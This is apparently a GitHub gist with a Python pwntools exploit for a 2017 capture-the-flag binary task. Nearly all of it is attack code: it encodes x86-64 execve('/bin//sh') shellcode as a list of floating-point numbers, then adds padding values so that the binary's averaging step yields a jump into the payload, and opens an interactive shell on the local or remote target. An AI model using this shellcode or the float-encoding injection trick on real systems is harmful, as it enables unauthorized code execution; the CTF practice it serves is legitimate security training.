Skip to content

Instantly share code, notes, and snippets.

@PaulCher
Created October 31, 2017 19:29
Show Gist options
  • Save PaulCher/1f4c5e45167bef01b815620afa80e875 to your computer and use it in GitHub Desktop.
Save PaulCher/1f4c5e45167bef01b815620afa80e875 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python
from pwn import *
context(os='linux', arch='amd64')
BINARY = './hq2017_task6_m116'
def generate_shellcode():
c1 = '\x6a\x68\x90\xbaAAAA'
c2 = '\xb8\x2f\x62\x69\x6e\xbaAA'
c3 = 'AA\x90\xbaAAAA'
c4 = '\xbb\x2f\x2f\x2f\x73\xbaAA'
c5 = 'AA\x48\xc1\xe3\x20\xbaA'
c6 = 'AAA\x48\x01\xd8\xbaA'
c7 = 'AAA\x50\xbaAAA'
c8 = 'A\x48\x89\xe7\xbaAAA'
c9 = 'A\x68\x73\x68\x00\x00\xbaA'
c10 = 'AAA\x31\xf6\x56\xbaA'
c11 = 'AAA\x6a\x08\x5e\xbaA'
c12 = 'AAA\x48\x01\xe6\xbaA'
c13 = 'AAA\x56\xbbAAA'
c14 = 'A\x48\x89\xe6\xbbAAA'
c15 = 'A\x31\xd2\x6a\x3b\xbbAA'
c16 = 'AA\x58\x0f\x05AAA'
cc = [c1, c2, c3, c4, c5, c6, c7, c8, c9, c10,c11, c12,c13,c14,c15, c16]
for c in cc:
print struct.unpack('d', c)[0]
def exploit():
REMOTE = 0
if REMOTE:
r = remote('spbctf.ppctf.net', 5353)
else:
r = process(BINARY)
f = [
"2261635.4575319784", #shellcode
"2323676.823308911",
"2261635.45752731",
"2323686.368627516",
"438363073.2822457",
"450363720.25490195",
"2261876.6269914214",
"2261877.8088770215",
"436207720.45080954",
"441906737.25490195",
"442370154.25490195",
"451281224.25490195",
"2261878.6738664214",
"2261879.8010645215",
"2324086.834539563",
"2261514.1198808257",
"29301000821.275124",
# last values to make (sum(f) / len(f)) == asm("jmp [rsp+0x70]")
"0",
"2921082450",
'1685813728.6539300419'
]
r.sendline(str(len(f)))
sleep(0.5)
s = ' '.join(f)
r.sendline(s)
r.interactive()
if __name__ == '__main__':
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment